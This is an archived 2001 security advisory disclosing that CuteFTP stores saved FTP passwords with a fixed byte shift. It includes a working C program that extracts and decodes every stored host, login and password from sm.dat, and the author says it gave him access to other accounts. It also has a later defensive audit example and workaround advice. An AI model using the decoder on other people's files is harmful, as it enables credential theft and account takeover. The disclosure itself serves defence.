scx-sa-21.txt

03 Aug 2001 | Reported by Incubus | Type: packetstorm | Source: packetstormsecurity.com

CuteFTP uses weak password encoding, allowing access to sensitive data through simple decryption.

`  
============================================================================  
Securax-SA-21 Security Advisory  
belgian.networking.security Dutch  
============================================================================  
Topic: CuteFTP uses a weak password encoding scheme  
Announced: 2001-08-01  
Affects: CuteFTP 4.2.4 and below. (but not too low)  
============================================================================  
  
Note: If you happen to find more information, solutions, ... about the below  
problem or further variants please contact me on the following email  
[email protected], or you can contact the Securax crew by e-mail at  
[email protected].  
  
I. Problem Description  
-----------------------  
  
Globalscape's CuteFTP is a popular FTP client. It is used to connect to   
remote ftp servers. CuteFTP has a kinda "Address book" which stores info on  
several FTP servers, such as hostname, login & password (basically the stuff  
you need to log in.. :)).  
  
In any case, CuteFTP uses a very weak encryption scheme: it adds 72 (hex 48)  
to each character of the plaintext password. So, Globalscape uses a kinda  
ROT-72 encryption scheme. There is no key involved, so anyone who can read  
the file can reverse it.  
  
Let's get down and dirty, technical that is.. How are the passwords stored?  
Well, they are stored in a file called "sm.dat". I'll give you an example:   
  
This is a part of the hex dump of my sm.dat:  
  
08 31 30 2E 30 2E 30 2E 33 05 41 64 6D 6D 69 05 BC AD BB BB A9  
^                          ^                 ^  
| - hostname (10.0.0.3) -  |    - login -    |  - encoded pw -  
|                          |                 |  
|___ len(hostname)         |__ len(login)    |__ len(password)  
  
The password is BC AD BB BB A9, but if you subtract hex 48 from each  
character, you'll see: 74 65 73 73 61, which is "tessa".  
  
So, as you can probably see, there is a user "Admin", with a password  
("tessa") on box 10.0.0.3.  
  
Cute(ftp) isn't it?  
  
  
II. Impact  
----------  
  
No, you won't be able to r3wt th3 pl4n3t with this, but it gave me access to  
several other accounts, because ftp and shell passwords are often the same.  
  
But instead of letting you calculate the password.. here's the code:  
  
--| BOF: cuteftpd.c |--   
  
/*   
  
CuteFTPd: a CUTE Fucking Too easy Password Decrypter  
----------------------------------------------------  
  
This code was made on a hot and sunny afternoon, (as we got many of em in  
Belgium). So, don't shoot me if some things won't work. I've found some  
problems when your login is 11 (0x0A) or 13 (0x0D) chars long... but what  
the hell.. fix it.  
  
This program is dedicated to Peter "DC" De Coninck, a good friend of mine  
who passed away in April. DC, I miss you, thank you for everything, take   
care man.  
  
All my love to Tessa, I love you forever, always, every day of my life,   
please marry me. I love you, i need you. please, be mine forever.  
  
Respect to all the great ppl at #[email protected]: U know who i mean,   
and who i don't mean. grmBL. ;)  
  
To Reggie: happy birthday!! =)  
  
Take care,  
incubus <[email protected]>  
  
ps: this code sucks, i know.  
  
*/   
  
  
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>
#define banner "\n-] CuteFTP password retrieval tool\n -------------------------------\n\n"
#define usage " usage: %s <path_to_sm.dat>\n\n"

int main(int argc, char **argv)
{
    FILE *list;
    int c, p, t, i;   /* int, so that EOF from fgetc() can be told apart from data */
    unsigned char host[128], un[128], ep[128], dp[128];

    printf("%s", banner);
    if (argc < 2) { printf(usage, argv[0]); exit(1); }
    if ((list = fopen(argv[1], "rb")) == NULL) {
        perror("error opening file"); exit(1); }

    /* Scan byte by byte for something that looks like a length-prefixed hostname. */
    while ((c = fgetc(list)) != EOF) {
        memset(host, 0x0, sizeof host);
        if (c >= 48) continue;                    /* not a plausible hostname length */
        p = fgetc(list);
        if (p == EOF || !isalnum(p)) continue;    /* hostname must start with a letter or digit */
        host[0] = p;
        for (i = 1; i < c; i++) {
            if ((t = fgetc(list)) == EOF) break;
            if (t != 13)
                if (!((t < 48) && (!isspace(t)) && (t != '.') && (t != '-') && (t != '_')))
                    host[i] = t;
        }
        if (!strchr((char *)host, '.')) continue; /* only report entries that look like hosts */
        printf("-] %s\n---] login: ", host);

        if ((p = fgetc(list)) == EOF) break;      /* login length byte */
        if (p == 0) { printf("anonymous\n\n"); continue; }
        memset(un, 0x0, sizeof un);
        for (i = 0; i < p; i++) {                 /* bytes beyond the buffer are read and dropped */
            t = fgetc(list);
            if (t != EOF && i < (int)sizeof un - 1) un[i] = t;
        }
        printf("%s\n password: ", un);

        p = fgetc(list);                          /* password length byte */
        memset(ep, 0x0, sizeof ep); memset(dp, 0x0, sizeof dp);
        for (i = 0; i < p; i++) {
            t = fgetc(list);
            if (t != EOF && i < (int)sizeof ep - 1) ep[i] = t;
        }
        for (i = 0; i < 128; i++) {               /* decode: subtract 72 (hex 48) from each byte */
            if (ep[i] != 0x0) {
                dp[i] = ep[i] - 72; printf("%c", dp[i]);
            }
        }
        printf("\n hex: ");
        for (i = 0; i < 128; i++)
            if (dp[i] != 0x0) printf("0x%02x ", dp[i]);
        printf("\n\n");
    }
    fclose(list);
    putchar(10);
    return 0;
}
  
--| EOF |--   
  
  
III. Workarounds  
----------------  
  
There's this nasty option which allows you to encrypt your sm.dat file, but  
let's take a look at that and see where and how that password is stored.. =)  
  
Other workarounds: don't save passwords in cuteftp, but remember 'em, or use  
another ftp client, OS, ...  
  
  
IV. Credits  
-----------  
All my love to Tessa.  
Respect: f0bic, F_F, r-dude, t-omicr0n, tosh, senti, zym0, vor, cic, primus,  
virtual, necro, ares, ... and so on, you know who you are.  
  
take care,  
  
-- incubus ([email protected]).  
  
============================================================================  
For more information [email protected]  
Website http://www.securax.org  
Advisories/Text http://www.securax.org/pers  
----------------------------------------------------------------------------  
  
`
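
The record layout from the hex dump in section I, parsed with bounds checks, as an added example (not the advisory's or GlobalSCAPE's code): it reports whether an entry holds a recoverable saved password, so such entries can be found and the credentials rotated. The three-field layout is assumed from that dump; `SAMPLE` is a constructed record using the page's password bytes, and `read_field` and `audit_record` are names made up here.

```c
#include <stdio.h>
#include <string.h>

#define SHIFT 0x48  /* 72: the constant the advisory says is added to each byte */

/* Constructed sample: len+host, len+login, len+encoded password. */
static const unsigned char SAMPLE[] = {
    8, '1','0','.','0','.','0','.','3', 5, 'A','d','m','i','n',
    5, 0xBC, 0xAD, 0xBB, 0xBB, 0xA9 };

/* Copy one length-prefixed field to out as a C string.
   Returns bytes consumed, or 0 if the field is truncated or too long for out. */
static size_t read_field(const unsigned char *p, size_t left, char *out, size_t outsz)
{
    if (left < 1 || (size_t)p[0] + 1 > left || (size_t)p[0] + 1 > outsz) return 0;
    memcpy(out, p + 1, p[0]);
    out[p[0]] = '\0';
    return (size_t)p[0] + 1;
}

/* Parse one record and undo the shift on the password in place.
   Returns 1 if a printable password is recoverable, 0 if the password field
   is empty, -1 if the record is malformed or does not decode to text. */
int audit_record(const unsigned char *rec, size_t len,
                 char *host, char *login, char *pw, size_t sz)
{
    char *out[3] = { host, login, pw };
    size_t off = 0, n = 0, i;
    for (i = 0; i < 3; i++) {
        if ((n = read_field(rec + off, len - off, out[i], sz)) == 0) return -1;
        off += n;
    }
    for (i = 0; i + 1 < n; i++) {          /* n - 1 is the password length */
        unsigned char d = (unsigned char)((unsigned char)pw[i] - SHIFT);
        if (d < 0x20 || d > 0x7e) return -1;
        pw[i] = (char)d;
    }
    return n > 1;
}

int main(void)
{
    char host[64], login[64], pw[64];
    int r = audit_record(SAMPLE, sizeof SAMPLE, host, login, pw, sizeof host);
    if (r == 1)   /* report the finding without printing the password itself */
        printf("%s: login '%s' has a recoverable saved password\n", host, login);
    return r < 0;
}
```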
